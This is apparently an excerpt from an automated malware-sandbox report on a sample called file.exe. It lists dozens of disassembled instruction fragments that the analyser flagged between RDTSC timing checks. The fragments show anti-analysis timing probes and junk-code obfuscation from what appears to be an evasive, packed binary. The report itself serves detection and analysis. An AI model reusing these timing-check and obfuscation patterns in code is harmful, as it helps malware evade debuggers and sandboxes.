                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149E3C second address: 1149EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D1D13h], esi 0x0000000d mov bl, ah 0x0000000f push dword ptr fs:[00000000h] 0x00000016 sub dword ptr [ebp+1244BAD1h], ecx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 add dword ptr [ebp+122D1E67h], eax 0x00000029 mov edi, dword ptr [ebp+122D1AFDh] 0x0000002f mov eax, dword ptr [ebp+122D0871h] 0x00000035 clc 0x00000036 push FFFFFFFFh 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F6F31ADDF68h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 xor dword ptr [ebp+122D1A22h], edi 0x00000058 mov di, dx 0x0000005b nop 0x0000005c jl 00007F6F31ADDF6Ah 0x00000062 push eax 0x00000063 pushad 0x00000064 popad 0x00000065 pop eax 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push edi 0x0000006a pushad 0x0000006b popad 0x0000006c pop edi 0x0000006d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DEFE second address: 114DFC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b ja 00007F6F31405BDCh 0x00000011 pop eax 0x00000012 nop 0x00000013 add di, F9D5h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F6F31405BD8h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 0000001Ch 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 push ecx 0x0000003a add bl, 00000074h 0x0000003d pop edi 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007F6F31405BD8h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f jmp 00007F6F31405BE7h 0x00000064 mov bx, dx 0x00000067 mov eax, dword ptr [ebp+122D0D5Dh] 0x0000006d jmp 00007F6F31405BE1h 0x00000072 push FFFFFFFFh 0x00000074 mov ebx, 0C923444h 0x00000079 push eax 0x0000007a push esi 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AE1A second address: 114AE20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EF65 second address: 114EF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149EAC second address: 1149EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31ADDF72h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CED9 second address: 114CEE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FFEB second address: 114FFF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152EC1 second address: 1152EC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FFF1 second address: 114FFF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11592F6 second address: 11592FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1158AAA second address: 1158AB0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1158BE3 second address: 1158BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EBD2 second address: 115EC1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push ebx 0x0000000d jnl 00007F6F31ADDF66h 0x00000013 pop ebx 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jno 00007F6F31ADDF70h 0x0000001f mov eax, dword ptr [eax] 0x00000021 jl 00007F6F31ADDF70h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b pushad 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f push edi 0x00000030 pop edi 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EC1C second address: 115EC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EC20 second address: 115EC24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EDB2 second address: 115EDE8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6F31405BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F6F31405BE8h 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EDE8 second address: 115EE00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jbe 00007F6F31ADDF72h 0x00000010 jp 00007F6F31ADDF6Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11632D7 second address: 11632F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11632F4 second address: 11632FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6F31ADDF66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11632FE second address: 1163302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163302 second address: 116330A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116330A second address: 116330F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116330F second address: 116331A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116331A second address: 116331E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116331E second address: 1163322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11638A1 second address: 11638A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11638A5 second address: 11638BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11638BD second address: 11638C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6F31405BD6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11638C8 second address: 11638CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11638CE second address: 11638D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163BD9 second address: 1163BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31ADDF6Ah 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163BEE second address: 1163BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163BF6 second address: 1163BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163BFC second address: 1163C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163C00 second address: 1163C09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1163EDA second address: 1163EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164460 second address: 1164483 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6F31ADDF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F6F31ADDF6Ch 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 push edi 0x00000018 pop edi 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop esi 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1168B2E second address: 1168B40 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6F31405BDAh 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E121 second address: 113E127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E223 second address: 113E227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E351 second address: 113E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E357 second address: 113E35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E907 second address: 113E90B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E90B second address: 113E92E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], esi 0x0000000a mov ecx, 22BA7DFEh 0x0000000f nop 0x00000010 pushad 0x00000011 pushad 0x00000012 jns 00007F6F31405BD6h 0x00000018 jo 00007F6F31405BD6h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E92E second address: 113E932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113EB01 second address: 113EB05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113EB05 second address: 113EB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113EC1F second address: 113EC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 nop 0x00000009 cmc 0x0000000a push 00000004h 0x0000000c jng 00007F6F31405BDCh 0x00000012 or ecx, dword ptr [ebp+1247248Bh] 0x00000018 push eax 0x00000019 jg 00007F6F31405BE0h 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113F236 second address: 113F259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F6F31ADDF66h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113F259 second address: 113F267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6F31405BDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113F353 second address: 113F3C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f sub dword ptr [ebp+122D1B3Eh], eax 0x00000015 mov eax, dword ptr [ebp+12448CE8h] 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp+12482ED7h] 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F6F31ADDF68h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c movsx edi, cx 0x0000003f nop 0x00000040 jmp 00007F6F31ADDF76h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F6F31ADDF77h 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1167D83 second address: 1167D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1167EDB second address: 1167EE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116809D second address: 11680C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c jnl 00007F6F31405BD6h 0x00000012 pop eax 0x00000013 je 00007F6F31405BE2h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11680C0 second address: 11680C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116836F second address: 1168373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1168373 second address: 1168391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6F31ADDF78h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1168391 second address: 1168396 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1168396 second address: 11683A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 je 00007F6F31ADDF66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170A2D second address: 1170A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170A37 second address: 1170A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170B6E second address: 1170B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170B72 second address: 1170B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF74h 0x00000007 jnp 00007F6F31ADDF66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170B90 second address: 1170BAC instructions: 0x00000000 rdtsc 0x00000002 js 00007F6F31405BDAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F6F31405BDCh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1171028 second address: 117102C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117102C second address: 1171046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31405BE1h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11711B8 second address: 11711DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6F31ADDF6Ah 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11711DD second address: 11711E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1170715 second address: 117071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1171A17 second address: 1171A1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1171A1D second address: 1171A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1171A29 second address: 1171A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1171A2D second address: 1171A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1171A33 second address: 1171A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F6F31405BD6h 0x00000009 jnp 00007F6F31405BD6h 0x0000000f pop eax 0x00000010 ja 00007F6F31405BDEh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177408 second address: 1177419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jc 00007F6F31ADDF66h 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177419 second address: 117743D instructions: 0x00000000 rdtsc 0x00000002 je 00007F6F31405BEAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F6F31405BE2h 0x0000000f jng 00007F6F31405BDCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11767A1 second address: 11767C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6F31ADDF66h 0x0000000a jmp 00007F6F31ADDF70h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11767C0 second address: 11767D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6F31405BD6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11767D4 second address: 11767D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176E75 second address: 1176EA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F6F31405BDEh 0x0000000e jmp 00007F6F31405BE6h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176EA7 second address: 1176EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177271 second address: 1177282 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6F31405BDBh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117A9CA second address: 117A9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117A9CF second address: 117A9D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D692 second address: 117D698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D698 second address: 117D69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D69E second address: 117D6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D6A7 second address: 117D6AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117D6AB second address: 117D6B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
